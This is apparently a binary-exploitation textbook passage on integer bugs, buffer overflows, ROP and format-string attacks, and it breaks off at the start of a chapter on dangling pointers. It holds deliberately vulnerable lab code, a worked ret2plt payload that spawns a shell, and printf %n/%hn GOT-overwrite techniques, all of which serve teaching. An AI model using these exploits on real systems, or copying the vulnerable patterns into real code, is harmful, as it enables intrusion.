Address space layout randomization (ASLR) makes it so the sections of a process are loaded at semi-random virtual addresses. Note that ASLR keeps the lower 12 bits of a section's base the same. ASLR works together with PIE to randomize where the start of the process is, and it also randomizes other regions of the process such as the stack.
NX (non-executable) means that the stack cannot be treated as instructions and executed.
Note that these mitigations are not always present, but most of the time they are enabled on real programs.
## [[#chapter two - Integer Issues]]
Numbers can be treated in two ways on the x86_64 architecture. Unsigned means every bit is used to represent the magnitude of the number; for example, in the unsigned byte 11010101, all eight bits represent the value. There are no negatives among unsigned numbers, just values greater than or equal to 0. Signed means the top bit represents whether the number is negative or positive, while the other bits represent the value: 00000001 would be 1, 11111111 would be -1, 10000000 would be -128, and 01111111 would be 127, so a signed byte covers the range -128 to 127. The CPU doesn't care whether a value is signed or unsigned; it is up to the instructions how numbers are interpreted.
Integer truncation happens when you try to store a value that's bigger than the byte(s) it's being placed into. The CPU keeps only the byte(s) that fit and cuts off the rest. For example, say we have the 4-byte value 0xaabbccdd and we try to store it inside 2 bytes. Only 0xccdd would be stored in those 2 bytes, because 0xaabbccdd is too big to fit, so the bytes that can't fit are cut off. The following code snippets are examples of integer truncation:
```
sub rsp, 2
mov eax, 0xAABBCCDD
mov word [rsp], ax
add rsp, 2
```
```
mov eax, 0x13377331
mov bx, ax
```
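The same truncation can be sketched in Python by masking off only the bytes that fit; this is just a model of what the narrowing store does, not something the book's labs use.

```python
# A 2-byte store keeps only the low 16 bits of the value.
value = 0xAABBCCDD
low_word = value & 0xFFFF   # what survives the 2-byte store
print(hex(low_word))        # 0xccdd
```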
Zero extension happens when a smaller value is moved into a larger group of bytes: the extra bytes above the original value are filled with zeros. For example, to make the ``eax`` register equal to ``byte [rsp]`` zero extended, we would do this: ``movzx eax, byte [rsp]``.
Sign extension is like zero extension, but instead of filling the bytes above the original value with zeros, they are filled with whatever the sign bit is (0 or 1). Say ``byte [rsp]`` stores 0x81; since the left-most bit of the number is 1, the number is treated as negative. If we did ``movsx eax, byte [rsp]``, eax would be set to 0xffffff81.
Also, do not forget that since we wrote to eax, the upper 4 bytes of rax will be zeroed out no matter what, even if a sign extension was done. For example: ``movsx eax, byte [rsp]`` sets the lower 4 bytes of rax to 0xffffff81, however the upper 4 bytes will be set to 0.
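A small Python sketch of the movzx/movsx behavior on a single source byte (the helper names zero_extend and sign_extend are made up for illustration):

```python
def zero_extend(byte_val):
    # movzx-style: the upper bytes become 0, the value is unchanged.
    return byte_val & 0xFF

def sign_extend(byte_val):
    # movsx-style: copy bit 7 of the byte into the upper 24 bits.
    byte_val &= 0xFF
    if byte_val & 0x80:
        return byte_val | 0xFFFFFF00
    return byte_val

print(hex(zero_extend(0x81)))   # 0x81
print(hex(sign_extend(0x81)))   # 0xffffff81
```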
You can think of integer overflow like a clock; however, there are two kinds of clocks: the unsigned one, which is the real kind, and the signed one, which is the fake kind. If an unsigned number increases above the maximum possible value for its byte size, it wraps around to 0 and can continue increasing from there. If a signed number increases above the maximum possible value for its signed size, it wraps around to the smallest possible value it can be and can continue increasing from there. The unsigned variant is the "real clock" because it actually overflows, unlike a signed number, which only gives the illusion of an overflow. Integer underflow is like integer overflow but in the other direction: instead of going up and wrapping to the smallest value, we go down and wrap to the biggest possible value.
Say we have the unsigned byte 0xff: if we add 1 it becomes 0, and if we add 2 instead of 1 it becomes 1. Say we have the signed byte 127: if we add 1 it "wraps around" to its minimum negative number, -128, but in reality the byte simply becomes 0x80, so it's an illusion because nothing physically wraps around; if we add 2 instead of 1 it becomes -127. Note that when an unsigned overflow/underflow occurs the CF (carry) flag is set, and during a signed overflow/underflow the OF (overflow) flag is set. So a program can check whether something over/underflowed via those 2 flags; however, it is important to remember that flags change a lot because other instructions overwrite them, so it's best to check them immediately:
```
add eax, 7
jc unsigned_overflow
jo signed_overflow
```
```
sub eax, 77
jc unsigned_underflow
jo signed_underflow
```
Or, if you need the result later, you can save the flag with setc/seto:
```
add eax, 7
setc bl
seto cl
```
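The wrap-around behavior described above can be modeled in Python on a single byte (the helper names add_u8 and to_s8 are hypothetical, purely for illustration):

```python
def add_u8(a, b):
    # Unsigned byte addition with wrap-around, like the CPU does it.
    return (a + b) & 0xFF

def to_s8(v):
    # Reinterpret a byte as a signed number (two's complement).
    return v - 0x100 if v & 0x80 else v

print(add_u8(0xFF, 1))        # 0: unsigned wrap, the "real clock"
print(to_s8(add_u8(127, 1)))  # -128: the signed "illusion" of wrapping
```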
Some instructions act differently depending on whether the number is signed or not. The x86_64 architecture has unsigned and signed versions of multiplication, division, and bit shifts. Bit shifting is when you move all the bits of a value to the left or the right a certain number of times. Each shift left (shl/sal) multiplies the number by 2 for every bit you shift, and each shift right (shr/sar) divides the number by 2 for every bit you shift. For example, a shift left by 1 multiplies the number by 2, a shift left by 2 multiplies it by 4, a shift right by 1 divides it by 2, and a shift right by 2 divides it by 4. The sal and shl instructions do the same thing; however, shr and sar are not the same: shr simply shifts to the right, while sar does the same but copies the sign bit into the vacated bit. When bit shifting, some bits get pushed out of the value. For example, in a right shift by 1, the rightmost bit is removed, the other bits move right, and the leftmost bit becomes 0 if shr is used; if sar is used, the leftmost bit copies the sign bit. The same concept applies to shl/sal but in reverse. To make the bits wrap around to the other end of the value, we can use the ror/rol instructions, which ensure there is no bit loss. Note that the second argument of any bit shift must be an actual number or the cl register, while the first argument must be a register or pointer. The bit shifting instructions are used like this: ``shr rax, 7``.
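To see the difference between shr and sar concretely, here is a Python sketch operating on a single byte (shr8 and sar8 are made-up helper names; Python's own ``>>`` on its unbounded ints is arithmetic, so the logical variant has to be emulated with a mask):

```python
def shr8(v, n):
    # Logical right shift of a byte: vacated bits become 0.
    return (v & 0xFF) >> n

def sar8(v, n):
    # Arithmetic right shift: vacated bits copy the sign bit.
    v &= 0xFF
    signed = v - 0x100 if v & 0x80 else v   # reinterpret as signed
    return (signed >> n) & 0xFF

print(hex(shr8(0x80, 1)))   # 0x40: the top bit became 0
print(hex(sar8(0x80, 1)))   # 0xc0: the sign bit was copied in
```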
The mul instruction performs an unsigned multiplication of rax/eax/ax/al by a register or a pointer. If the register or pointer is a byte in size, al is multiplied and the result is stored in ax. If mul is used with a 2-byte pointer or register, ax is multiplied: the upper half of the result is stored in dx while the lower half is stored in ax, and if the result isn't big enough to need the split, dx is set to 0. The same concept applies to eax and edx, and to rax and rdx. If the upper half of the result isn't 0, the CF (carry) flag and the OF (overflow) flag are both set; otherwise they are cleared. The usage of mul is like this: ``mul rbx``. The imul instruction has three forms. The first form is just like mul, but it treats the argument as a signed number; it can be used like ``imul rbx``. The second form takes a register as the first argument and a pointer or register as the second; it can be used like ``imul ebx, ecx``. The third form is like the second but has one more argument, which must be an actual number: this form multiplies the second and third arguments and stores the result in the first argument, which must be a register.
The div instruction performs unsigned division. It takes a number made up of two connected registers, a high half and a low half, and divides it by either a register or a pointer. The result is split into the quotient and the remainder: the quotient goes into the lower register, while the remainder goes into the higher register. For a byte argument the lower register is al and the higher register is ah, for a 2-byte argument the lower register is ax and the higher register is dx, and so on. The cqo instruction sign extends rax into rdx, while cdq does the same for eax and edx.
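The quotient/remainder split that div performs maps directly onto Python's divmod, which we can use to sanity-check an example by hand:

```python
# 1000 / 7: div would leave the quotient in the lower register
# and the remainder in the higher register; divmod returns the same pair.
dividend, divisor = 1000, 7
quotient, remainder = divmod(dividend, divisor)
print(quotient, remainder)   # 142 6
```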
The difference between jg(e)/jl(e) and ja(e)/jb(e) is that the first set is for signed numbers while the second set is for unsigned numbers. Mixing up the two kinds of jumps may not seem bad, but in reality it is. For example, say we want to jump somewhere if our number is less than 0:
```
cmp qword [rel USER_NUMBER], 0
jb location
```
The code would NEVER jump to location because this is an unsigned check and nothing is below 0.
Say we have:
```
cmp qword [rel USER_NUMBER], 73
jl location
```
This code will jump if USER_NUMBER is 72 or below as a signed number. The reason that is so dangerous is that a negative USER_NUMBER passes a signed check like the one above, and we may then use USER_NUMBER for something such as the size of a buffer, which brings us into the next chapter.
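A short Python sketch of how the very same byte pattern reads as two wildly different numbers depending on signedness:

```python
# The 8-byte pattern ff ff ff ff ff ff ff ff:
raw = (-1).to_bytes(8, "little", signed=True)

as_signed = int.from_bytes(raw, "little", signed=True)
as_unsigned = int.from_bytes(raw, "little", signed=False)

print(as_signed)    # -1: sails through a signed "jl 73" style check
print(as_unsigned)  # 18446744073709551615: enormous if later used as a size
```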
## [[#chapter three - Out of Bounds Reads and Writes]]
A buffer is a contiguous block of memory that is used to store data. Think of a buffer like a group of identical boxes in a line, one after another, with no space in between them. A buffer has a start (where in RAM it begins) and a length (how many bytes are reserved for it). Since a buffer is just memory, it could live in any of several sections of the process, such as the stack, .data, .bss, the heap, etc. A 4-byte buffer could have the contents 0x7, 0x0, 0x0, 0x0 and could be interpreted as a 4-byte number; it is up to the process how to treat and interpret the buffer.
Say we have a video game with a function that writes the names of the top X players on the leaderboard to a file. Say that, in memory, the passwords of all of those users come right after the leaderboard. If X were bigger than the number of players, the passwords of those players would be written to the file along with their usernames, which would be bad. Say we have the following code:
```
read_top_X_players_from_leaderboard:
lea rsi, [rel leaderboard_user01_username]
[WRITES DATA TO FILE STARTING AT THE ADDRESS THAT RSI CONTAINS STOPPING WHEN RDI MATCHES THE NUMBER OF 0s]
ret
some_random_function:
...
mov rdi, [rel USER_CONTROLLED_NUMBER]
call read_top_X_players_from_leaderboard
...
section .data
leaderboard_user01_username db "user", 0
leaderboard_user02_username db "User", 0
leaderboard_user03_username db "uSer", 0
leaderboard_user04_username db "usEr", 0
leaderboard_user05_username db "useR", 0
leaderboard_user01_password db "password", 0
leaderboard_user02_password db "Password", 0
leaderboard_user03_password db "pAssword", 0
leaderboard_user04_password db "paSsword", 0
leaderboard_user05_password db "pasSword", 0
```
Since rdi is user controlled, we simply set our user_controlled_number to 10 and we get the usernames and passwords of every user on the leaderboard. The above concept is called an out of bounds read. An out of bounds read occurs when we can view more data than the process intended to give us, because of something like a bad size.
Say we have a small video game where the user's name is stored in a buffer of 10 bytes, and right after the buffer is the user's health as a 4 byte number. Say the code is the following:
```
; Say user_name is 10 bytes long and user_health is stored right after user_name
create_user:
mov byte [rel user_health], 100
xor eax, eax
xor edi, edi
lea rsi, [rel user_name]
mov edx, 20
syscall ; read syscall
ret
```
The above code is poorly designed: user_name is 10 bytes long but we are reading up to 20 bytes, so the user's health can be corrupted if more than 10 bytes are entered. When a buffer's contents go beyond the length of the buffer and may corrupt other data, it is called a buffer overflow or an out of bounds write.
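A Python model of this exact overflow may make it more tangible; the 14-byte bytearray standing in for the 10-byte name buffer plus the adjacent 4-byte health field is an assumption for illustration only.

```python
# Hypothetical layout: bytes 0-9 are user_name, bytes 10-13 are user_health.
memory = bytearray(14)
memory[10:14] = (100).to_bytes(4, "little")   # user_health = 100

user_input = b"A" * 20   # the flawed read accepts up to 20 bytes
# The write runs past the 10-byte name buffer; model the 14 bytes
# that land inside our little region.
for i, byte in enumerate(user_input[:14]):
    memory[i] = byte

health = int.from_bytes(memory[10:14], "little")
print(health)   # no longer 100: the bytes "AAAA" read as 0x41414141
```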
With a buffer overflow on the stack, the data that gets corrupted is the data pushed before the buffer, because the stack grows downwards (remember?) while the overflowing writes move towards higher addresses. Assuming there is no stack canary, if the overflow reaches the return address we can return anywhere inside an executable section, such as the PLT or .text. If the stack were executable in this example, we could even return to a buffer on the stack and start running that buffer's bytes as code, assuming we knew the buffer's address; code injected and run this way is called shellcode. In most modern programs the stack is NX, so it cannot be executed; however, we can still return anywhere we want inside an executable section, assuming there is no stack canary and no shadow stack. The following code is an example of controlling where we return after overwriting the return address.
```
global main
extern system
section .text
helpful_gadgets:
pop rdi
ret
func:
sub rsp, 16
mov edx, 1000
mov rsi, rsp
xor edi, edi
xor eax, eax
syscall ; read
mov byte [rsi + rax - 1], 0
xor edx, edx
dec edx
loop:
inc edx
mov bl, byte [rsi + rdx]
mov byte [string + rdx], bl
cmp dl, 15
jl loop
lea rdi, [rel echo]
call system
add rsp, 16
ret
main:
call func
mov edi, 7
mov eax, 60
syscall ; exit
section .data
bin_sh db "/bin/sh", 0
echo db "echo buffer: "
string times 10 db 0
```
We can overwrite the return address so that instead of returning to the intended spot, the process returns anywhere we want inside an executable section. With the correct input we could even make this process spawn a shell. First we write enough bytes to reach the return address, then we overwrite the return address with the address of ``helpful_gadgets``. The next 8 bytes of the input are the address of bin_sh, so it gets popped into rdi before the gadget returns to the next element on the stack. After that, the next 8 bytes are the address of the ``ret`` instruction after the ``pop rdi`` inside ``helpful_gadgets``, so the stack is aligned to 16 bytes for the call to system. The next 8 bytes are the address of the call to system inside ``func``. The next 16 bytes can be anything, because after the call to system inside ``func``, 16 is added to the stack pointer and the function returns to the next element on the stack, which we could make anything, such as the ``mov edi, 7`` inside ``main``; after edi is set to 7, the exit syscall right after makes the process exit.
I want to drive home the point that if we have control over the return address and bytes after, we basically have full control over the process (assuming there is no shadow stack). For example say we have the following code:
```
add_7:
add eax, 7
ret
add_14:
add eax, 14
ret
add_21:
add eax, 21
ret
```
If we have control over the return address and the bytes after, we can return anywhere inside an executable section: we can return to add_14, add_7, then add_21, or add_7, add_21, then add_14. A pretty cool thing to note is that right above many ret instructions sit a lot of pops, so say we know there is a call to some function that takes 3 arguments (rdi, rsi, rdx); we can find code that pops data into those registers and then ends in a ret. These little snippets of code that end in a ret and do things like pop data into registers, set registers to a certain value, add two registers together, etc. are called gadgets. Gadgets don't actually have to end in a ret; they can end in a call or a jump as well. The idea of stringing together gadgets that end in ret to make the process do a certain thing is called return oriented programming (ROP); if the gadgets end in a jump it is called jump oriented programming (JOP), and if they end with a call it is called call oriented programming (COP).
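A toy Python model of ROP may help: treat the stack as a list of return addresses and each ret as popping the next one and jumping there. The addresses and gadget behaviors below are invented for illustration.

```python
# Each "gadget" mutates some CPU state and then "returns".
def add_7(state):  state["eax"] += 7
def add_14(state): state["eax"] += 14
def add_21(state): state["eax"] += 21

# Hypothetical addresses where those gadgets live.
gadgets = {0x1000: add_7, 0x2000: add_14, 0x3000: add_21}

state = {"eax": 0}
stack = [0x2000, 0x1000, 0x3000]   # our chosen return addresses, in order

while stack:
    # Each "ret" pops the next address and transfers control there.
    gadgets[stack.pop(0)](state)

print(state["eax"])   # 14 + 7 + 21 = 42
```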
Say we have the following code for a video game:
```
inc_gold:
lea rdi, [rel OUR_PLAYER_ADDRESS]
cmp qword [rdi + IS_ADMIN_OFFSET], IS_ADMIN
jne return
inc byte [rdi + GOLD_OFFSET]
return:
ret
```
Say earlier in the process we got control over the return address and the bytes after, and assume the player address isn't already in rdi. First we would return to ``lea rdi, [rel OUR_PLAYER_ADDRESS]``; the code would check whether we are an admin (in this case we aren't) and the process would return to wherever, but since we control the return address and the bytes after, we can make the process return to ``inc byte [rdi + GOLD_OFFSET]`` over and over again until we are satisfied with our amount of gold. The purpose of this game example is to show you that we can truly return anywhere inside any executable section we want. In a binary linked against libc, there are a lot of places to return to, assuming once again that we control the return address and the bytes after, and that there is no shadow stack. From the earlier example we could get a shell a different way:
```
global main
extern system
section .text
helpful_gadgets:
pop rdi
ret
func:
sub rsp, 16
mov edx, 1000
mov rsi, rsp
xor edi, edi
xor eax, eax
syscall ; read
mov byte [rsi + rax - 1], 0
xor edx, edx
dec edx
loop:
inc edx
mov bl, byte [rsi + rdx]
mov byte [string + rdx], bl
cmp dl, 15
jl loop
lea rdi, [rel echo]
call system
add rsp, 16
ret
main:
call func
mov edi, 7
mov eax, 60
syscall ; exit
section .data
bin_sh db "/bin/sh", 0
echo db "echo buffer: "
string times 10 db 0
```
So we would overwrite the return address with the address of ``helpful_gadgets``, the next 8 bytes of the input would be the address of bin_sh, and the 8 bytes after that would be system's PLT entry. The final 8 bytes of the input would be the address of the ``mov edi, 7`` inside ``main``. Returning to a libc function's PLT entry is usually a better way of calling a libc function, because when the process returns to the PLT entry, the libc function will return cleanly once it finishes, unlike returning into an actual call instruction, which is probably sitting in the middle of a bunch of other code.
You may be asking, "how do I actually find the address of a function or gadget?" Well, for the above examples we were going with the assumption that PIE was disabled. In the real world, PIE will be enabled for most binaries. To find the address of a function or gadget with PIE disabled, we will go to the ~/labs directory and open 01_ret2plt_buffer_overflow in gdb. First we will look at the ``func`` function via the ``disass func`` command, which will show us this:
```
Dump of assembler code for function func:
0x0000000000401132 <+0>: sub rsp,0x10
0x0000000000401136 <+4>: mov edx,0x3e8
0x000000000040113b <+9>: mov rsi,rsp
0x000000000040113e <+12>: xor edi,edi
0x0000000000401140 <+14>: xor eax,eax
0x0000000000401142 <+16>: syscall
0x0000000000401144 <+18>: mov BYTE PTR [rsi+rax*1-0x1],0x0
0x0000000000401149 <+23>: xor edx,edx
0x000000000040114b <+25>: dec edx
End of assembler dump.
```
We can see that we are calling the read syscall with a size of 1000; however, there are only 16 bytes on the stack we can use before the return address gets overwritten. So now let's look at the loop part of ``func`` to see if anything crazy is happening. We will type ``disass loop`` and we will see this:
```
Dump of assembler code for function loop:
0x000000000040114d <+0>: inc edx
0x000000000040114f <+2>: mov bl,BYTE PTR [rsi+rdx*1]
0x0000000000401152 <+5>: mov BYTE PTR [rdx+0x40402d],bl
0x0000000000401158 <+11>: cmp dl,0xf
0x000000000040115b <+14>: jl 0x40114d <loop>
0x000000000040115d <+16>: lea rdi,[rip+0x2ebc] # 0x404020
0x0000000000401164 <+23>: call 0x401030 <system@plt>
0x0000000000401169 <+28>: add rsp,0x10
0x000000000040116d <+32>: ret
End of assembler dump.
```
We see that we copy 16 bytes (indices 0 through 15) from rsi + rdx to 0x40402d + rdx. We also see that system@plt is located at 0x401030, which will be important for our input. We can type ``x &bin_sh`` to get the address of ``bin_sh``; GDB prints ``0x404018: "/bin/sh"``, so the string "/bin/sh" is stored at that address. Finally we can enter ``disass helpful_gadgets`` to get the address of helpful_gadgets and look at its code; we see that it pops the top element off the stack into rdi and then returns:
```
Dump of assembler code for function helpful_gadgets:
0x0000000000401130 <+0>: pop rdi
0x0000000000401131 <+1>: ret
End of assembler dump.
```
Now we can reason about how to craft our input: we know we need 16 bytes to reach the return address, and we want to pop the address of bin_sh into rdi and call system. We can now craft our input: ``MMMMMMMMMMMMMMMM\x30\x11\x40\x00\x00\x00\x00\x00\x18\x40\x40\x00\x00\x00\x00\x00\x30\x10\x40\x00\x00\x00\x00\x00\x73\x11\x40\x00\x00\x00\x00\x00``
The \x before a pair of characters means we want those two characters to be treated as one hex byte. The reason there are 0s after each address is that every address must be written as a full 8 bytes in little-endian order, so the stack pops line up; the padding 0s make each address exactly 8 bytes long. Say we want to run the input against the program: we would first write our input to a file like this: ``printf 'MMMMMMMMMMMMMMMM\x30\x11\x40\x00\x00\x00\x00\x00\x18\x40\x40\x00\x00\x00\x00\x00\x30\x10\x40\x00\x00\x00\x00\x00\x73\x11\x40\x00\x00\x00\x00\x00' > example.bin``. We would then test the input against the program with the sender program like this: ``sender 01_ret2plt_buffer_overflow example.bin``. We would then get a shell.
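If typing \x escapes by hand gets tedious, the same payload can be built with Python's struct module. The first three addresses are the ones from the GDB output above; the final one is taken from the original escape string (0x401173, the place we return to after system).

```python
import struct

payload  = b"M" * 16                    # 16 bytes to reach the return address
payload += struct.pack("<Q", 0x401130)  # helpful_gadgets: pop rdi; ret
payload += struct.pack("<Q", 0x404018)  # address of "/bin/sh", popped into rdi
payload += struct.pack("<Q", 0x401030)  # system@plt
payload += struct.pack("<Q", 0x401173)  # where to return after system finishes

# "<Q" means a little-endian unsigned 8-byte value, which is exactly
# why the hand-typed version needed those trailing \x00 padding bytes.
with open("example.bin", "wb") as f:
    f.write(payload)
```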
When looking at a function it is important to keep track of the space from the buffer to the return address so we know how many bytes to input to reach the return address.
If PIE is enabled, things get more complicated. We would know the offsets (how far things are from the start of the program) of the functions, gadgets, strings, etc., but we would not know the base, so we would need to find it. We can get the offsets by doing what we did before in GDB; this time, because PIE is enabled, GDB shows us offsets instead of full addresses. There are many ways to get the base, such as using the cat program like this: ``cat /proc/PID/maps``; the first address on the first line is the base of the process. We would add the base to the offsets to get the addresses of the data. Another way to get the base of the process is to leak a runtime address of something whose offset we already know, and then subtract that known offset from the leaked address.
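A sketch of that base computation in Python; the leaked address and the offset here are made-up example values.

```python
# Suppose we leaked the runtime address of func, and GDB (on the
# non-running binary) told us func sits at offset 0x1132.
leaked_func_addr = 0x55E4C2A01132   # hypothetical leak, different every run
func_offset      = 0x1132

base = leaked_func_addr - func_offset
print(hex(base))

# The base is page aligned, so its low 12 bits must be zero;
# this is a handy sanity check on any computed base.
assert base & 0xFFF == 0
```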
Programs built against older glibc versions contain a function called ``__libc_csu_init``, and in that function are a bunch of gadgets that pop data from the stack into registers. For example, a small part of ``__libc_csu_init`` could look like this:
```
pop r9
pop r8
pop r10
pop rdx
pop rsi
pop rdi
ret
```
Such gadgets are very useful because they let us make certain registers hold any values we want and then return where we want, assuming we return to an executable section.
Stack pivoting is when we change the stack pointer so it holds the address of a memory region we control; that region is then treated as the new stack. For example, say you know the address of a section that is writable and executable (WHICH IS EXTREMELY RARE): you could write some shellcode into that section, make the stack pointer point to the first address of the section, and also make the instruction pointer equal to the stack pointer; you would then have full control over the process because you can run anything you desire. Another example of stack pivoting: say the remaining stack space is too small and you can't push more than 2 elements onto the stack; you would change the stack pointer to point somewhere else, which must at least be writable, so you can push/pop data on that new stack.
## [[#chapter four - Format String Fun]]
The printf function is a glibc function that can be used in a variety of ways, for example say we want to print a 4 byte number, we would do this:
```
extern printf
global main
main:
sub rsp, 8
lea rdi, [rel fmt]
mov esi, 123456789
call printf
add rsp, 8
ret
section .data
fmt db "%d", 10, 0
```
Note that the 10 is there to print a newline, which is just a way to say "anything after this character gets printed below what was already printed." The 0 is there to end the string.
As you know, glibc functions read their arguments in this order: rdi, rsi, rdx, rcx, r8, r9, then the stack. Also note that the stack pointer has to be aligned to 16 bytes because printf requires it; when main starts executing its code, the stack pointer is not aligned to 16, so we subtract 8 from it. The arguments of the above call to printf are the address of fmt (computed relative to the instruction pointer) and the number 123456789. The glibc function printf takes more arguments than you might think; in fact, printf will consume as many arguments as the format string specifies. For example:
```
extern printf
global main
main:
sub rsp, 8
lea rdi, [rel fmt]
mov esi, 123456789
call printf
add rsp, 8
ret
section .data
fmt db "first num: %d, second num: %d, third num: %d, fourth num: %d", 10, 0
```
In the above code, printf can be thought of as walking through the string whose address rdi holds, one byte at a time, printing each byte. When it encounters the % character, it knows that part of the string is a format specifier, which is simply the name for the things that start with %. Format specifiers can have certain characters after the %, such as d, p, x, s, n, etc. (you will see more later!). When printf sees a format specifier, it replaces that specifier with the next argument: the first format specifier is replaced with the contents of rsi, the next with the contents of rdx, the next with rcx, and so on. Note how we did not set rdx and rcx; printf just prints whatever happens to be there. If there are more arguments than registers, printf starts grabbing data from the stack, beginning at the stack pointer plus 8 bytes, moving 8 bytes at a time. Before I go deeper, I want to tell you about the %s format specifier: it treats its argument as an address and prints data starting at that address, byte by byte, until it reaches a byte equal to 0 (otherwise called a null byte). Say we wanted to print 10 arguments as 4-byte hex numbers with printf; we could do that like this:
```
extern printf
global main
main:
sub rsp, 8
lea rdi, [rel fmt]
call printf
add rsp, 8
ret
section .data
fmt db "%x, %x, %x, %x, %x, %x, %x, %x, %x, %x", 10, 0
```
Truthfully, it would not matter what the arguments are; printf will simply read as many arguments as there are format specifiers. Another thing I want to note before I go deeper is that there are some format specifier tricks, such as: "print at least this many characters", "print this argument instead of that one", "print this many zeros before the corresponding argument", "add a 0x before the corresponding argument", etc. To print a minimum of 16 characters, we could do the following:
```
extern printf
global main
main:
sub rsp, 8
lea rdi, [rel fmt]
mov esi, 7
call printf
add rsp, 8
ret
section .data
fmt db "%16x", 10, 0
```
The above code would print 15 space characters, followed by 7. To replace the space characters with zeros, we would put a 0 before the 16, like this: %016x. Say printf was called with 2 arguments (excluding rdi of course), and say we wanted for some reason to print the same argument twice, we could do the following:
```
extern printf
global main
main:
sub rsp, 8
lea rdi, [rel fmt]
mov esi, 123456789
mov edx, 1738
call printf
add rsp, 8
ret
section .data
fmt db "%d and %1$d", 10, 0
```
The above code would print the contents of esi twice, because in the second format specifier we specified that we want it to select the first argument instead of the second, which it would have selected by default.
We can make printf take the width from an argument using the \* character. For example, %\*c takes the current argument as the total number of characters to print: padding bytes, followed by the next argument:
```
extern printf
global main
main:
sub rsp, 8
lea rdi, [rel fmt]
mov esi, 7
mov edx, 'm'
call printf
add rsp, 8
ret
section .data
fmt db "%*c", 10, 0
```
The above code will print 7 characters in total: 6 padding characters and then m.
A leak is when we access bytes the process never intended to give us. You saw leaks above, but this time I am going to explain them. An example of a leak could be getting the value of the stack canary. The glibc function printf can leak data, as you saw above indirectly. Say we wanted to leak 4 bytes from each of the first 4 arguments, we could simply do this:
```
extern printf
global main
main:
sub rsp, 8
lea rdi, [rel fmt]
call printf
add rsp, 8
ret
section .data
fmt db "%x, %x, %x, %x", 10, 0
```
The above code would give us the 4 lower bytes of rsi, rdx, rcx, and r8. If we wanted a full address we would replace x with p. As I briefly showed above, we don't even need to supply 10 printf arguments to leak the 10th argument; we simply make rdi a pointer to the string "%10$p". I also showed above that %s treats the current argument like an address and prints the data there until it reaches a 0 byte. Say we have a secret string at the 12th argument; if we could make rdi hold the address of a string like "%12\$s" right before printf is called, the secret string would be printed. Sometimes you may not know which argument holds the data you care about, or whether any argument even holds it. The only way to find out is to scan for it: scanning is basically just testing variations of the string that rdi will hold when printf is called. Some of those strings could look like this: %7\$p, %20\$s, %12\$x, etc.
Remember, PIE randomizes where the program gets mapped in virtual memory but doesn't modify the distances between the sections. Those distances stay the same, so if a leaked address came from a program section, you can subtract the address's offset inside the program file from the leaked address to get the base of the process. So if you leak an address that is in the .text section, you can actually bypass PIE. Say the 7th argument holds this address: 0x555555554777, and say that address belongs to .text; bypassing PIE would be as easy as pie! You would look at the program in gdb and see something like this:
```
0x0000000000000777 <+0>: [SOME ASSEMBLY INSTRUCTION]
```
From that leak you would subtract 0x777 from 0x555555554777 and would know where the process is in virtual memory. You may be thinking "wait, how do I know that address corresponds to that offset?" The answer is, as you may recall, ASLR randomizes all the bits of a section's start besides the lower 12, so all you need to do is check whether the lower 12 bits of the leak match an offset inside the program. You may be asking "why does knowing the base address of the process matter?" It matters because we can take any program, look at it in gdb, and see the offsets of everything: .text is here, this random string is here, etc. With the base of the process leaked, we know where all of that is while the process is running, so we know where everything we might want to read, write, or execute lives. Say we have a buffer overflow on the stack and we overwrite the return address; we now know exactly where to return to.
With printf, not only can we leak data, we can also WRITE to addresses. The %n specifier writes the number of characters printed so far, as a 4 byte number, to the address given by the corresponding argument. For example, if we wanted to write 7 as a 4 byte number into address 0x1337, we could do this:
```
extern printf
global main
main:
sub rsp, 8
lea rdi, [rel fmt]
mov esi, 0x1337
call printf
add rsp, 8
ret
section .data
fmt db "AAAABBB%n", 10, 0
```
Assuming 0x1337 is a valid virtual address, 4 bytes (3 bytes of 0, the other byte being 7) would be written there. If we wanted to write the count as an 8 byte number, we would use %ln; for 2 bytes we would use %hn; finally, for a single byte we would use %hhn. Say we wanted to write the number of characters printed so far to the address held by the 20th argument; we could simply do this: %20$n. It's important to note that printf counts the actual characters printed, not the bytes in the format string. For example, say we have the following string: "mmmmmmmmm%7c%n"; 16 characters would be printed before we write to the address that the next argument holds.
You may be asking "ok, so if we can write anywhere in the process, can we get the process to do what we want?" The answer is yes, in many different ways. For example, say we know which offset in the GOT corresponds to a certain glibc function, and we know where the start of the GOT is. If we also know the address of system in the PLT, or the address of the glibc function system itself, we can overwrite that offset in the GOT with the address of system, so the next time that function is called, system is called instead. In the real world, the user of a process sometimes has control over the format string, assuming the code is poorly written. A user who controls the string can leak data, and if the conditions are right, like rsi holding the address of a glibc function's entry in the GOT, they could overwrite that entry with another function, assuming they know its address; this is actually a very common scenario. If full RELRO is enabled we would not be able to change anything in the GOT, but we could still leak data. We can overwrite something inside the GOT like this: say exit's entry in the GOT is at address 0x1337, and say the function system is at address 0x132f:
```
extern printf
global main
main:
sub rsp, 8
lea rdi, [rel fmt]
mov esi, 0x1337
call printf
add rsp, 8
ret
section .data
fmt db "%4911c%1$n", 10, 0
```
We can easily write 0x132f as a 4 byte number into the address 0x1337, since %4911c prints 4911 (0x132f) characters before the %n. As you have seen so far, if you know the address of something, you can change it, assuming you have control over the arguments printf uses, including the string. However, what if the value you want to write is big, like an address? You would need to print that many characters before %n. Say we want to write the value 0x7ffff7e13370; printf cannot print anywhere close to that number of characters in a reasonable amount of time. So instead of printing that many characters, we break the write into smaller chunks. Say we want to write 0x789f133773310000 into address 0x7ffff7e13370; the code below shows how it could be done:
```
extern printf
global main
main:
sub rsp, 8
lea rdi, [rel fmt]
mov rsi, 0x7ffff7e13370
mov rdx, 0x7ffff7e13372
mov rcx, 0x7ffff7e13374
mov r8, 0x7ffff7e13376
call printf
add rsp, 8
ret
section .data
fmt db "%1$hn%29489c%2$hn%40966c%3$hn%25960c%4$hn", 10, 0
```
Before I tell you what the above code does, it is important to know that when printf encounters %n it takes the number of characters printed and only writes the lower 4 bytes; if printf encounters %hn it is the same idea, just with 2 bytes instead of 4. First of all, the %1$hn part of the string writes 0 as 2 bytes to 0x7ffff7e13370. Then we have %29489c, which prints 29489 more characters, making the total printed equal to 0x7331; that count is written to 0x7ffff7e13372 as 2 bytes via %2\$hn. Next, %40966c prints 40966 more characters, resulting in 0x11337 characters printed, and %3\$hn writes the lower 2 bytes of the count, 0x1337, to 0x7ffff7e13374. We print 25960 more characters, bringing the total to 0x1789f. Finally, we write the lower 2 bytes of the count, which is 0x789f, to 0x7ffff7e13376 via %4\$hn.
## [[#chapter five - Dangling Pointers]]
As you may recall, a pointer is a register or a memory location that holds an address. Pointers can be used for a variety of reasons. For example, say we have a register that holds the address of a string, and we want to capitalize all the lowercase characters; we could do this:
```
global _start
section .text
_start:
sub rsp, 15
mov byte [rsp], 'h'
